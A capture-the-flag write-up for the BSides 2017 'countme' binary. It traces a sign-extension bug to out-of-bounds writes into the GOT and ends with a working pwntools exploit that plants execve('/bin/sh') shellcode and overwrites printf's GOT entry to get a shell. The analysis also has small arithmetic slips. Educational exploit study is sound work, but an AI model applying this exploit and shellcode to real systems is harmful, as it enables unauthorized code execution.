Countme-1 (Pwn)


You can find the original question here. I really enjoyed solving this question. Shoutout to TheColonial and all the other organizers for making such an awesome CTF


So first, we run the binary through "file", And it comes out to be 32 bit binary, stripped.

[email protected] ~/Hack_stuff/bsides-2017-ctf-docker/pwn-countme1 $ file countme
countme: ELF 32-bit LSB  executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.32, BuildID[sha1]=4bdd35b8440ee7f07fc9d8b57beec62c4ac19ffd, strippe

Doing a checsec on binary returns the following results. There is no NX bit, which is weird, and it also maybe gives us an idea that maybe we need to execute shellcode in this binary

[email protected] ~/Hack_stuff/bsides-2017-ctf-docker/pwn-countme1 $ checksec countme
[*] '/home/ssnague/Hack_stuff/bsides-2017-ctf-docker/pwn-countme1/countme'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX disabled
    PIE:      No PIE (0x8048000)

We then run the binary to see it's functionality, and it looks like we have to enter a string, and the program counts the occurences of each character and prints it.

[email protected] ~/Hack_stuff/bsides-2017-ctf-docker/pwn-countme1 $ ./countme
aaaaab
Found 'a' a total of 5 time(s)
Found 'b' a total of 1 time(s)

Since there are no symbols, We pop the binary into Hopper disassembler(free trial cuz im poor), and figure out the main by looking at the cross references of strings.

So the main function starts at 0x8048475 , So now we can use gdb for dynamaic analyis.

By Doing some random fuzzing for 15-20 mins, here are some key points which I analyzed(without looking at the assembly atm)

  1. It can only count upto 255 occurences of a character, meaning each of them is stored in a single byte space only

  2. Chars which have their charcode value above than 127 are not being counted(which is kinda sketchy), So only ASCII characters are counted(or maybe they are just now shown)


Now for the analysis stage, here is an explanation of what exactly is happening

08048476         mov        ebp, esp
08048478         push       ecx
08048479         sub        esp, 0x14
0804847c         mov        byte [ss:ebp+var_D], 0x0
08048480         sub        esp, 0x4
08048483         push       0x100                                               ; argument "len" for method j_memset
08048488         push       0x0                                                 ; argument "c" for method j_memset
0804848a         push       0x804a040                                           ; argument "b" for method j_memset
0804848f         call       j_memset
08048494         add        esp, 0x10

Firstly, A call to memset() is made with the following parameters memset(0x804a040, 0x0, 0x100),

Which sets 160 bytes of memory(starting from 0x804a040) to 0/Nulls.

The address provided here is a constant, meaning that it won't change even with ASLR enabled. This should be noted for future reference.

0804849a         push       0x1                                                 ; argument "nbyte" for method j_read
0804849c         lea        eax, dword [ss:ebp+var_D]
0804849f         push       eax                                                 ; argument "buf" for method j_read
080484a0         push       0x0                                                 ; argument "fildes" for method j_read
080484a2         call       j_read
080484a7         add        esp, 0x10
080484aa         cmp        eax, 0x1
080484ad         jne        0x80484d8

080484af         movzx      eax, byte [ss:ebp+var_D]
080484b3         cmp        al, 0xa
080484b5         je         0x80484d8

080484b7         movzx      eax, byte [ss:ebp+var_D]
080484bb         cmp        al, 0xd
080484bd         je         0x80484d8

080484bf         movzx      eax, byte [ss:ebp+var_D]
080484c3         movsx      eax, al
080484c6         movzx      edx, byte [ds:eax+0x804a040]
080484cd         add        edx, 0x1
080484d0         mov        byte [ds:eax+0x804a040], dl
080484d6         jmp        0x8048497

In the first part here,

A call to read() is made, which reads one byte and store it at ebp+var_D. Then it checks if the read byte is not a newline(0xa) or a Carriage return(0xd).

If it is neither of those, it then increases a counter at a relative location eax+0x804a040 in which eax holds the ASCII/charcode of the character we have entered.

So for eg if we entered "A", the ASCII code of "A" is 0x61, then it will retrieve the value stored at 0x61 + 0x804a040, add 1 to the value retrieved, and then write it back to the same location. Initially all the values are 0 because of the memset() call in the starting.

080484d8         mov        dword [ss:ebp+var_C], 0x0                           ; XREF=sub_8048475+56, sub_8048475+64, sub_8048475+72
080484df         jmp        0x8048516

080484e1         mov        eax, dword [ss:ebp+var_C]                           ; XREF=sub_8048475+168
080484e4         add        eax, 0x804a040
080484e9         movzx      eax, byte [ds:eax]
080484ec         test       al, al
080484ee         je         0x8048512

080484f0         mov        eax, dword [ss:ebp+var_C]
080484f3         add        eax, 0x804a040
080484f8         movzx      eax, byte [ds:eax]
080484fb         movzx      eax, al
080484fe         sub        esp, 0x4
08048501         push       eax
08048502         push       dword [ss:ebp+var_C]
08048505         push       0x80485b4                                           ; "Found '%c' a total of %d time(s)\\n", argument "format" for method j_printf
0804850a         call       j_printf
0804850f         add        esp, 0x10

08048512         add        dword [ss:ebp+var_C], 0x1                           ; XREF=sub_8048475+121

08048516         cmp        dword [ss:ebp+var_C], 0xff                          ; XREF=sub_8048475+106
0804851d         jle        0x80484e1

Now the final part of the program.

A variable ebp+var C is initialized to 0. From on then, the value at ebp+var_C + 0x804a040 is loaded into eax, and then checked if it not 0

If the value is more than 0, a call to printf() is made which prints the value stored at location, along with the variable ebp+var_C .

At the end, ebp+var_C is compared with 0xff and if it is less, 1 is added to it and the whole process is repeated again and again until ebp+var_C is increased to more than 0xff.

What's happening here is essentially each charcode from 0-255 is checked at their relative location from 0x804a040, and if any of them is more than 0, it is printed. This can be represented as a C for loop

for(int i = 0; i <= 0xff; ++i){
    if((int *)(i + 0x804a040) > 0){
        printf("Found '%c' a total of %d time(s)\n",(int *)(i + 0x804a040),(int *)(i + 0x804a040))
    }
}

So far, we have analyzed the whole functionaltiy of the program, but we did not see anything which can allow to redirect code execution


In this case, the bug was actually very subtle and it took me a lot of time figure it out(dynamic analysis with gdb helped a lot). So here is the vulnerable snippet

080484bf         movzx      eax, byte [ss:ebp+var_D]
080484c3         movsx      eax, al

080484cd         add        edx, 0x1
080484d0         mov        byte [ds:eax+0x804a040], dl

There are two types of mov instructions used here, movsx and movzx. A quick google serach revealed their functionality

MOVSX moves a signed value into a register and sign-extends it with 1.

MOVZX moves an unsigned value into a register and zero-extends it with zero.

        mov     bx, 0C3EEh  ; Sign bit of bl is now 1: BH == 1100 0011, BL == 1110 1110
        movsx   ebx, bx     ; Load signed 16-bit value into 32-bit register and sign-extend
                            ; EBX is now equal FFFFC3EEh
        movzx   dx, bl      ; Load unsigned 8-bit value into 16-bit register and zero-extend
                            ; DX is now equal 00EEh

So for movsx, if we use it to move a signed value from 16/8 bit register to a bigger register, it will then extend the value with 0xfffs to retain the signed bit(or thats what I think, correct me if I am wrong).

So if al has a value more than 127, it will extend it with 0xffff, which result in a really large number being stored in eax and the addressing at movzx edx, byte [ds:eax+0x804a040] will go terribly wrong, and we will access much higher memory location than we are entitled to.(Since it is a really large number, It would more be like doing a small subtraction instead of a large addition because the addition carry is just lost)

Let's pop it in gdb and see if our assumtions are right

So here with my gdb-peda, I set up a breakpoint at 0x80484c6, and now when we inspect the value in eax, we see that it is a super high value. Now let's see where does it point to, and what can we do with it.

gdb-peda$ x/100w $eax+0x804a040
0x8049fc1:    0xf0000000    0x946fffff    0x00080482    0x00000000
0x8049fd1:    0x00000000    0x00000000    0x00000000    0x00000000
0x8049fe1:    0x00000000    0x00000000    0x00000000    0x00000000
0x8049ff1:    0x00000000    0x00000000    0x00000000    0x14000000
0x804a001:    0x3808049f    0xb0f7ffd9    0x80f7ff04    0x36f7eda2
0x804a011:    0x00080483    0xe0f7e16a    0x00f7f2bb    0x00000000
0x804a021:    0x00000000    0x00000000    0x00000000    0x00000000
0x804a031:    0x00000000    0x00000000    0x00000000    0x00000000
0x804a041:    0x00000000    0x00000000    0x00000000    0x00000000
0x804a051:    0x00000000    0x00000000    0x00000000    0x00000000
0x804a061:    0x00000000    0x00000000    0x00000000    0x00000000
0x804a071:    0x00000000    0x00000000    0x00000000    0x00000000
0x804a081:    0x00000000    0x00000000    0x00000000    0x00000000
0x804a091:    0x00000000    0x00000000    0x00000000    0x00000000
0x804a0a1:    0x00000000    0x00000000    0x00000000    0x00000000
0x804a0b1:    0x00000000    0x00000000    0x00000000    0x00000000
0x804a0c1:    0x00000000    0x00000000    0x00000000    0x00000000
0x804a0d1:    0x00000000    0x00000000    0x00000000    0x00000000
0x804a0e1:    0x00000000    0x00000000    0x00000000    0x00000000
0x804a0f1:    0x00000000    0x00000000    0x00000000    0x00000000
0x804a101:    0x00000000    0x00000000    0x00000000    0x00000000
0x804a111:    0x00000000    0x00000000    0x00000000    0x00000000
0x804a121:    0x00000000    0x00000000    0x00000000    0x00000000
0x804a131:    0x00000000    0x00000000    0x00000000    0x00000000
0x804a141:    0x00000000    0x00000000    0x00000000    0x00000000

Here we see some weird addresses in the memory starting from 0x804a000 , and they look like libc addresses. Doing a vmmap on the binary, we see that the memory after 0x804a000 is also writeable

By some educated guessing and some fooling around with objdump, I figure out that this is the GOT section of binary, where we can now write arbitary data. YAYYYYY!!!!!!

08048310 <[email protected]>:
 8048310:    ff 35 04 a0 04 08        pushl  0x804a004 ; Address as shown in above pic, means we are at GOT
 8048316:    ff 25 08 a0 04 08        jmp    *0x804a008
 804831c:    00 00                    add    %al,(%eax)
    ...

08048320 <[email protected]>:
 8048320:    ff 25 0c a0 04 08        jmp    *0x804a00c
 8048326:    68 00 00 00 00           push   $0x0
 804832b:    e9 e0 ff ff ff           jmp    8048310 <[email protected]>

This means we can overwrite the function pointer of some function in the GOT(Global offset Table), and then when the function will be called, we would be able to redirect program execution. And since NX bit is disabled, we can write our shellcode at some location in memory, and then overwrite global offset table to point to our shellcode :)

The best candidate for placing our shellcode would be the buffer which is used to store the "count" of characters, since it is also at a static location, we can just hardcode the address in our exploit.

Since buffer stores how many characters of a specific char we have in our string, we can use that behaviour to write shellcode in the buffer.

We can take each byte of shellcode, and print the appropriate number of same characters, So the byte will be written into memory, and we can continue doing it with the whole shellcode, increasing the character code by 1 each iteration.

For eg to write 0x31, we can give an input like "a" * 49(or 49 times "a") which will write 0x31 in a specific relative memory location pointed by "a"

Here is a simple python script which does that and creates a payload

shellcode = "\x31\xc9\xf7\xe1\xb0\x0b\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80" #Shellcode from shell-storm

payload = ""

for k in range(len(shellcode)): 
    payload += chr(15+k) * ord(shellcode[k])

I am starting it from the 15th byte in the buffer because we can't write to 10th(0xa) and 13th(0xd) byte on the buffer as newlines break the read() loop.

So by looking at gdb, it looks like our shellcode has been written at 0x804a04f

Now we just need to overwrite an entry in GOT, and I believe we only have one choice, ie printf() because we can't overwrite read() as we write byte by byte, and if we write byte by byte to read() GOT entry, the program woulg segfault without completing.

 08048330 <[email protected]>:
 8048330:    ff 25 10 a0 04 08        jmp    *0x804a010
 8048336:    68 08 00 00 00           push   $0x8
 804833b:    e9 d0 ff ff ff           jmp    8048310 <[email protected]>

It looks the printf() GOT address is located at 0x804a010 , and by doing some simple offset calculations(and trial-error on gdb), we come to the conclusion that we can overwrite the printf() GOT by using chars 208-2011(LSB to MSB).

Since printf() has not been called earlier, it would still have a trampoline(PLT) address stored in the entry(which is static, unlike the resolved libc address, which changes with ASLR. So we can just calculate the difference those two addresses, and then write to the GOT byte by byte.

Shellcode Address               ==> 0x804a04f
Printf Stored GOT Address       ==> 0x8048336

Since the large two MSB's are the same, we only need to change the lower two bytes.

The difference between 0x4f and 0x36 is 25. And the difference between 0xa0 and 0x83 is 19. Since we can use the chars 209 and 210 to write to the LSB's of printf(), here is out final exploit

payload += chr(209)*29 + chr(208)*25

Thus our full payload is completed here. Here is a full python implementation of the exploit(using pwntools)

from pwn import *

shellcodeLocation = 0x804a04f
#                   0x8048336

r = remote("127.0.0.1", 8000)

shellcode = "\x31\xc9\xf7\xe1\xb0\x0b\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80" #Shellcode from shell-storm

payload = ""

def exp():
    r.sendline(payload)#Payload sent
    log.info("PAYLOAD SENT")
    log.info("You should probably have a shell now")
    r.interactive()#Interactive shell

payload += chr(209)*29 + chr(208)*25  #Overwrite last two bytes of GOT of printf, addresses are compared above



for k in range(len(shellcode)): #Making a payload of the shellcode(byte by byte) for the binary
    payload += chr(15+k) * ord(shellcode[k]) #Writing the number of bytes needed to set the appropriate memory, starting from 15 cuz earlier values were kinda misbehaving(0xa(\n) ended the loop)

log.info("PAYLOAD CREATED")

exp() #Sending the payload

Feel free to email me for any clarifications or any mistakes on my part at [email protected]

Thanks for reading,
Jazzy

results matching ""

    No results matching ""